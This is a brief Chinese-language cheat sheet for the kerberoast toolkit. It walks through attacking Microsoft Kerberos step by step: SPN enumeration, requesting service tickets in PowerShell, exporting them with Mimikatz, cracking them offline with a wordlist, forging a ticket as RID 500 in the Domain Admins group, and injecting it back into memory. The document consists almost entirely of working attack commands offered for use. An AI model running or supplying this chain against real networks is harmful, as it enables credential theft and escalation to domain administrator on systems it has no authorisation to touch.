kerberoast

项目地址： https://github.com/nidem/kerberoast
kerberoast是用来攻击微软Kerberos的实现。

PS C:> setspn -T medin -Q /

使用window自带攻击提取SPN user

PS C:> Add-Type -AssemblyName System.IdentityModel
PS C:> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

请求一个ticket

PS C:> Add-Type -AssemblyName System.IdentityModel
PS C:> setspn.exe -T medin.local -Q / | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

请求所有ticket

mimikatz # kerberos::list /export

配合Mimikatz从ram中提取获得的ticket

/tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

使用rgsrepcrack破解

重写：

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

确保user看上去是另一个不同的user

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

把user添加到另一个group中，在本例中是域管理员组

kerberos::ptt sql.kirbi

使用Mimikatz注入到ram